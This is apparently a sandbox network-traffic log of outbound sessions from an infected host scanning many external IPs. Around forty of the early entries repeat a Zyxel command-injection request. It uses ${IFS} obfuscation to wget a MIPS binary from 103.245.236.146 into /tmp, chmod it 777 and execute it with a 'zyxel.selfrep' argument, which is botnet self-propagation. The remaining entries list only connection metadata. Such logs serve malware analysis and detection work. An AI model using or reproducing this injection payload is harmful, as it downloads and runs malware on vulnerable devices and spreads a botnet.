                                                        Jan 28, 2024 10:13:12.789247990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9465192.168.2.1440348149.106.209.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789321899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9466192.168.2.145912685.59.6.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789344072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9467192.168.2.143652844.180.44.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789378881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9468192.168.2.1453634186.13.216.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789407969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9469192.168.2.14460961.104.162.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789443970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9470192.168.2.145105447.252.122.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789509058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9471192.168.2.1438984211.101.50.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789537907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9472192.168.2.1443512175.40.44.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789596081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9473192.168.2.1454528108.163.42.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789609909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9474192.168.2.145084424.83.167.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789663076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9475192.168.2.143508862.87.48.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789699078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9476192.168.2.1444220109.94.21.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789741039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9477192.168.2.145672663.180.70.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789791107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9478192.168.2.144449043.230.202.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789830923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9479192.168.2.144558886.16.139.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789885044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9480192.168.2.144001692.223.9.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789920092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9481192.168.2.1444818208.179.24.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789940119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9482192.168.2.1453324109.8.254.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.789967060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9483192.168.2.1456520101.83.29.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790002108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9484192.168.2.1452040172.234.107.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790036917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9485192.168.2.144003689.52.86.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790076017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9486192.168.2.1450852160.38.160.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790122986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9487192.168.2.14349088.89.155.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790138960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9488192.168.2.1433724121.5.135.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790173054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9489192.168.2.145816660.32.93.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790230036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9490192.168.2.144183052.124.32.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790273905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9491192.168.2.1452570135.27.140.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790313005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9492192.168.2.144583676.80.190.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790344954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9493192.168.2.143925469.229.231.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790400028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9494192.168.2.143794298.169.44.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790436983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9495192.168.2.1459318152.54.62.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790468931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9496192.168.2.1432834181.20.211.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790513992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9497192.168.2.145830864.204.42.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790554047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9498192.168.2.1454804136.203.132.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790599108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9499192.168.2.1451076123.107.181.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790628910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9500192.168.2.1436036162.52.81.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790662050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9501192.168.2.1439096133.204.193.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790716887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9502192.168.2.144667258.27.59.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790740013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9503192.168.2.143941232.227.3.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790771961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9504192.168.2.1434548122.143.178.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790807009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9505192.168.2.144717676.235.44.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790858984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9506192.168.2.143991084.64.97.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.790900946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9507192.168.2.1433582199.202.94.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9508192.168.2.1444226116.129.123.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9509192.168.2.143951477.69.238.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9510192.168.2.143670287.54.123.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9511192.168.2.145801498.89.242.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9512192.168.2.144120227.254.240.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9513192.168.2.1455026164.226.180.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9514192.168.2.1433504196.99.180.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9515192.168.2.1437070222.103.224.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9516192.168.2.143524289.63.184.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9517192.168.2.144757295.99.47.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9518192.168.2.1456060172.148.82.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9519192.168.2.145957059.177.230.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9520192.168.2.1433886160.126.33.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9521192.168.2.144430277.2.74.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9522192.168.2.14598144.199.172.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9523192.168.2.1445650163.22.131.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9524192.168.2.143462423.179.129.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9525192.168.2.1450068191.125.223.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9526192.168.2.144807489.108.63.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9527192.168.2.1445564120.163.132.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9528192.168.2.1451816126.123.71.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9529192.168.2.143713044.248.152.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9530192.168.2.1451028206.30.56.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9531192.168.2.145014225.5.103.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9532192.168.2.1434404191.233.121.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9533192.168.2.1448846134.244.13.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9534192.168.2.1458600157.95.128.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9535192.168.2.145383214.64.100.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9536192.168.2.145816872.175.121.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9537192.168.2.14387168.161.33.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9538192.168.2.1441124152.197.241.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9539192.168.2.146096866.140.143.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9540192.168.2.1446780184.134.104.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9541192.168.2.1444124185.177.245.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9542192.168.2.1449282151.88.58.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9543192.168.2.145451093.55.186.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9544192.168.2.145513020.78.160.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9545192.168.2.1437540221.138.241.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9546192.168.2.144631097.193.17.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9547192.168.2.1459548104.97.88.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9548192.168.2.1448210206.224.65.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9549192.168.2.145301275.212.18.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9550192.168.2.1437920204.206.230.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9551192.168.2.1455662186.80.104.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9552192.168.2.145861232.103.25.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9553192.168.2.145547850.143.161.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9554192.168.2.143479452.238.240.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9555192.168.2.1441286203.197.38.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9556192.168.2.1460624152.195.44.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9557192.168.2.144964697.143.48.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9558192.168.2.144826453.121.175.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9559192.168.2.145411890.20.111.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9560192.168.2.1453868207.47.240.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9561192.168.2.1449344195.251.118.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9562192.168.2.143621267.5.151.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9563192.168.2.143831645.28.191.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9564192.168.2.1457696210.179.235.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9565192.168.2.1441760144.223.163.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9566192.168.2.1440736139.200.18.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9567192.168.2.14474364.246.55.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9568192.168.2.1433170160.163.140.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9569192.168.2.1437336134.132.98.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9570192.168.2.143610691.210.89.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9571192.168.2.145788238.184.130.44443
                                                        TimestampBytes transferredDirectionData


